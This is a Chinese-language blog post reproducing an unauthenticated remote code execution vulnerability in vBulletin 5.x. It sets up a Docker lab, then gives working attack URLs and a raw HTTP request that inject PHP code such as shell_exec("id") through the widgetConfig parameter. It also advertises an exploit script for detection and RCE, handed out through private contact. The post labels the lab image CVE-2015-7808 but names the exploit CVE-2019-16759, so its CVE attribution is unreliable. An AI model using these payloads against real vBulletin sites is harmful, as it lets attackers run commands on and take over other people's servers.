一、环境搭建:
启动环境:
docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808
进入容器修改配置:
docker exec -it 54e406047f4a /bin/bash
更新apt源,然后装vim:
apt-get update
apt install vim
修改配置:
vim /etc/apache2/apache2.conf
# 最后一行补这个配置
ServerName localhost:80
给根目录下的run.sh加上执行权限并启动:
chmod +x ./run.sh
./run.sh
然后漏洞环境就搭建完成了
二、漏洞描述:
vBulletin 是世界上用户非常广泛的PHP论坛,很多大型论坛都选择vBulletin作为自己的社区。vBulletin高效,稳定,安全,在中国也有很多大型客户,比如蜂鸟网,51团购,海洋部落等在线上万人的论坛都用vBulletin。vBulletin的官方网站是 http://www.vBulletin.com 它不是免费软件,但价格很低。
vBulletin 5.x 爆出一个前台远程代码执行漏洞,无需登录即可触发
三、漏洞复现:
http://xxx.com/?routestring=ajax%2Frender%2Fwidget_php&widgetConfig
=phpinfo();exit;
可以看到phpinfo成功被执行:
RCE Payload:
http://xxx.com/?routestring=ajax%2Frender%2Fwidget_php&widgetConfig
=echo%20shell_exec(%22id%22);exit;
请求数据包:
GET /?routestring=ajax%2Frender%2Fwidget_php&widgetConfig
=echo%20shell_exec(%22id%22);exit; HTTP/1.1
Host: 192.168.136.143
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
执行结果:
四、自写漏洞EXP:
支持漏洞检测、RCE利用
python3 CVE-2019-16759_EXP.py target_domain
执行结果:
脚本已经打包好了,需要的看官后台留言:vBulletin exp,链接有效期为7天,请注意保存,请仅用于学习研究!
各位师傅可以加好友一起学习交流交个朋友,如果之前分享的exp失效了,也可以加我好友py一下:qq:1254311935
备注:公众号+师傅们的id吧
注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!
注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!
注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论